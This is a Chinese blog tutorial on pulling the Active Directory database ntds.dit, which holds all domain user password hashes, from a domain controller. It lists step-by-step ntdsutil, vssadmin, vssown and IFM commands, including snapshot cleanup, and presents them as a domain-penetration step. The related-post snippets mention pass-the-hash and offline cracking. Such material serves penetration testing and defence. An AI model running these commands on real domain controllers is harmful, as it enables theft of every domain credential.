域控安全:多种方式提取ntds.dit

于 2024-08-07 14:37:32 发布
阅读量668 收藏 7
点赞数 12
文章标签: 内网安全 域控安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80116443/article/details/140990692
版权

ntdsutils.exe提取ntds.dit

vssadmin提取ntds.dit

vssown提取ntds.dit

IFM

ntds.dit:

ntds.dit为AD的数据库,内容有域用户、域组、用户hash等信息,域控上的ntds.dit只有可以登录到域控的用户(如域管用户、DC本地管理员用户)可以访问。ntds.dit包括三个主要表:数据表、链接表、sd表。所以只要在域渗透中能够获取到ntds.dit就可以获取到所有域用户的用户名和对应的hash,它和SAM文件一样,被windows系统锁死

多种方式提取和移动ntds.dit文件

ntdsutils.exe提取ntds.dit:

系统自带工具ntdsutils.exe 是一个为活动目录提供管理机制的命令行工具,使用 ntdsutils.exe 可以维护和管理活动目录数据库、控制单个主机操作、创建应用程序目录分区等,该工具默认安装在域控服务器上,可以在域控制器上直接操作,支持windows server 2003、2008、2012。提取过程分为3步

第一步:创建快照:

ntdsutil.exe snapshot "activate instance ntds" create q q

可以看到快照的uid

第二步:加载快照:

ntdsutil.exe snapshot "mount {bda4374b-380d-4900-ad63-a23d40a71413}" q q

可以看到快照地址

第三步:复制快照中的ntds.dit文件

copy '快照地址\Windows\NTDS\ntds.dit' 目标地址

第四步:删除快照

ntdsutil.exe snapshot "umount {bda4374b-380d-4900-ad63-a23d40a71413}" "delete {bda4374b-380d-4900-ad63-a23d40a71413}" q q

vssadmin提取ntds.dit:

vssadmin1是Windows Server 2008及Windows 7系统提供的VSS管理工具,它可以用于创建或删除卷影副本,列出卷影副本的信息(只能管理系统Provider创建的卷影副本)。还可以用于显示所有安装的所有卷影副本写入程序(writers)和提供程序(providers),以及改变卷影副本存储空间(即所谓的“diff空间”)的大小等。支持的操作系统:Server 2008、Server 2012

第一步:创建快照:

vssadmin create shadow /for=c:

第二步:复制文件:

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\NTDS\ntds.dit C:\Users\Administrator\Desktop\ntds\ntds.dit

第三步:删除快照:

vssadmin delete shadows /for=c: /quiet

vssown提取ntds.dit

vssown.vbs和vssadmin类似,它是由Tim Tomes开发完成的,它可以创建和删除卷影副本,以及启动和停止卷影复制服务

第一步:启动卷影复制服务:

cscript vssown.vbs /start

第二步:创建一个C盘的卷影副本

cscript vssown.vbs /create c

第三步:列出当前卷影副本

cscript vssown.vbs /list

第四步:复制文件

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\windows\NTDS\ntds.dit

C:\Users\Administrator\Desktop\ntds\ntds.dit

第五步:删除卷影副本

cscript vssown.vbs /delete {B2B8CFA7-1BE5-4800-9F22-DD127282D904}

IFM:

可以通过创建一个 IFM 的方式获取 ntds.dit,在使用 ntdsutil 创建媒体安装集(IFM)时,需要进行生成快照、加载、将 ntds.dit 和计算机的 SAM 文件复制到目标文件夹中等操作,这些操作也可以通过PowerShell 或 VMI 远程执行。

第一步:

ntdsutil "ac i ntds" "ifm" "create full c:/test" q q

第二步:删除

rmdir /s/q C:\test

闰土炖猹
关注
  • 12
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
使用卷影拷贝提取ntds.dit
weixin_41082546的博客
02-15 822
一、简介   通常情况下,即使拥有管理员权限,也无法读取域控制器中的C:\Windows\NTDS\ntds.dit文件。使用windows本地卷影拷贝服务,就可以获得该文件的副本。   在活动目录中,所有的数据都保存在ntds.dit中。ntds.dit是一个二进制文件,存储位置为域控制器的%SystemRoot%\ntds\ntds.ditntds.dit中包含用户名、散列值、组、GPP...
内网渗透(四十七)之域控安全和跨域攻击-多种方式提取和移动ntds.dit文件
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-21 275
通过前面系列文章的学习,我们已经学会了通过横向移动的方法拿下域控,在我们控制域控后,我们应该读取域控上的ntds.dit文件,获取域内所有用户的密码和hash,以此来控制所有的域内机器ntds.dit为ad的数据库,内容有域用户、域组、用户hash等信息,域控上的ntds.dit只有可以登录到域控的用户(如域管用户、DC本地管理员用户)可以访问。ntds.dit包括三个主要表:数据表、链接表、sd表。
域控安全 ----> Ntds.dit文件抓取
huohaowen的博客
05-05 1542
大家还记得内网渗透的初衷吗???找到域馆,拿下域控!!拿下了域控就是拿下了整个域!!但是大家知道拿下域环境之后应该怎么操作吗(灵魂拷问)???那么下面,开始我们今天的内容 NTDS.DIT文件!!
[内网渗透]—卷影拷贝提取ntds.dit
Sentiment的博客
12-08 905
ntds.dit文件是一个数据库,用于存储Active Directory数据,包括有关用户对象,组和组成员身份的信息。它包括域中所有用户的密码哈希。通过提取这些哈希值,可以使用诸如Mimikatz之类的工具执行哈希传递攻击,或使用诸如Hashcat之类的工具来破解这些密码。这些密码的提取和破解可以脱机执行,因此将无法检测到。一旦攻击者提取了这些散列,它们便可以充当域上的任何用户,包括域管理员。在活动目录中,所有的数据都保存在ntds.dit中。
服务器渗透文件,域渗透——获得域控服务器的NTDS.dit文件
weixin_39603217的博客
08-03 526
0x00 前言在之前的文章《导出当前域内所有用户hash的技术整理》曾介绍过通过Volume Shadow Copy实现对ntds.dit文件的复制, 可用来导出域内所有用户hash。本文将尝试做系统总结,总结多种不同的方法。0x01 简介本文将要介绍以下内容:多种实现方法比较优缺点0x02 通过Volume Shadow Copy获得域控服务器NTDS.dit文件测试系统:Server 2008...
域之ntds.dit
SecINAdmin的博客
11-26 1366
ntds.ditntds.dit为ad的数据库(C:\Windows\NTDS),内容有域用户、域组、用户hash等信息,域控上的ntds.dit只有可以登录到域控的用户(如域管用户、DC本地管理员用户)可以访问。ntds.dit包括三个主要表:数据表、链接表、sd表。所以只要在域渗透中能够获取到ntds.dit就可以获取到所有域用户的用户名和对应的hash,ntds.dit是加密的,需要获取system来解密。查看dit数据库可使用https://github.com/yosqueoy/ditsna
域控制器中提取Active Directory数据库(NTDS.DIT)
Ping_Pig的博客
10-23 2459
目录 讲在前面: 本地安全机构子系统服务(LSASS) 场景思考 注意 ntds.dit介绍:https://blog.csdn.net/qq_41874930/article/details/108141331 部分方法如下: 使用NTDSUtil的Create IFM在DC上本地捕获ntds.dit文件 使用VSS卷影副本远程拉ntds.dit 使用PowerSploit的Invoke-NinjaCopy远程拉ntds.dit(需要在目标DC上启用PowerShell远程处理) 注意
ntds.dit 获取域内用户ntlm hash
qq_46635165的博客
11-17 2125
前提:在获取了域控权限后,可以通过读取ntds.dit 获取域内更多资产信息 概念: 在活动目录中,所有域内数据都保存在ntds.dit中,存储位置为 %SystemRoot%\ntds\ntds.dit,ntds.dit中包含用户名,散列值,组,OU,GPP等活动目录相关信息; 在域控主机中默认自带了ntdsutil.exe ,是一个为活动目录提供管理机制的程序,使用ntdsutil.exe 用于维护活动目录等,ntdsutil.exe 支持的操作系统有win2003,win2008,win2012; 目
ntds.dit提取hash和域信息
weixin_34228662的博客
09-14 451
本文讲的是从ntds.dit提取hash和域信息,在渗透测试进入内网之后,首要目标就是得到域控权限,将域中所有用户的hash值全部跑出来,下载到本地。很多工具比如meterpreter中的smart_hashdump和Impacket中的secretsdump.py都可以做到。 但是有些情况下我只能拷贝出来NTDS.dit文件,然后离线将这些密码提取...
一次授权任务的内网渗透 作者: 疯猫网络.pdf
04-08
\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\windows\NTDS\ntds.dit c:\ntds.dit`命令,从快照中复制ntds.dit文件。 3. **复制SYSTEM文件** - 使用`copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\...
域控服务器备份和恢复.pdf
05-19
3. **AD和DNS服务备份**:AD数据库包含Ntds.dit(数据库)、Edbxxxx.log(事务日志)、Edb.chk(检查点文件)及Res1.log和Res2.log(预留日志文件)。SYSVOL包含登录脚本、策略对象和需要同步的文件。这些内容应与...
如何搭建AD域控的辅域控.doc
10-07
指定数据库(NTDS.DIT)、日志文件和SYSVOL文件夹的存储位置。默认路径通常是合适的,但也可以根据磁盘空间和性能需求进行调整。 13. **设置紧急模式密码**: 创建“目录服务还原模式”(DSRM)的密码。这个密码...
关于windows2003主域控及额外域控的实践.doc
10-10
1. 对于"msdcs.qhsbd"正向区域,确保其区域类型为"Active Directory 集成区域",复制范围设置为"到Active Directory域中的所有域控制器",同时启用安全的动态更新。 2. 在"名称服务"标签中,添加额外域控制器的全局...
域控损坏ActiveDirectory转移整理.pdf
02-23
《主域控损坏ActiveDirectory转移整理》这篇文档主要讲解了当主域控制器(Primary Domain Controller, PDC)损坏时,如何安全地转移Active Directory数据,并将额外域控制器(Backup Domain Controller, BDC)提升为...
Spring Boot校园交友网站.zip
08-06
随着信息技术和网络技术的飞速发展,人类已进入全新信息化时代,传统管理技术已无法高效,便捷地管理信息。为了迎合时代需求,优化管理效率,各种各样的管理系统应运而生,各行各业相继进入信息管理时代,校园交友网站就是信息时代变革中的产物之一。 任何系统都要遵循系统设计的基本流程,本系统也不例外,同样需要经过市场进行调研,论文需求进行分析,概要设计,系统详细设计,测试和编码等步骤,设计并实现了校园交友网站。系统选用java语言,B/S模式和Mysql为后台数据库。系统主要包括首页、个人中心、用户管理、线下活动管理、交友信息管理、活动报名管理、交流论坛、系统管理等功能模块。
毕业设计,基于ASP+ACCESS开发的软件信息发布系统,内含完整源代码,数据库,开题报告,毕业论文
08-06
毕业设计,基于ASP+ACCESS开发的软件信息发布系统,内含完整源代码,数据库,开题报告,毕业论文 随着计算机及网络技术的飞速发展,Internet/ Intranet应用在全球范围内日益普及,当今社会正快速向信息化社会前进,信息自动化的作用也越来越大,并且信息已成为世界三大资源之一,并成为我们日常生活中必不可少的部分,信息化已成为社会发展的一个必然趋势,信息化水平也是科学技术水平和经济发展程度的重要标志。众所周知,信息管理活动从手工记录到计算机存储,从平面文件到关系型数据库,从单机单用户数据库访问模式到客户/服务器模式,从客户/服务器模式到浏览器/服务器,信息管理的技术越来越先进、科学和客观。同时,可管理的信息容量也越来越大,更适应信息膨胀时代的要求。然而软件也应用于各个领域并在迅速的发展中,随着当今社会信息化的日新月异的发展,计算机应用已经渗透到日常工作的许多方面无论是其自身还是所发挥的作用,计算机都标志着一种高科技、高效率和高水平。在信息的海洋中,软件信息在整个信息体系中起着举足轻重的作用。因此为了能让更多的软件使用者能获得最全面的软件信息,能用上最好的软件,从而使我们从繁杂
13.书法书体检测与识别.zip
最新发布
08-06
13.书法书体检测与识别
C语言-教室信息管理系统
08-06
C语言-教室信息管理系统,课程设计文档及代码。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值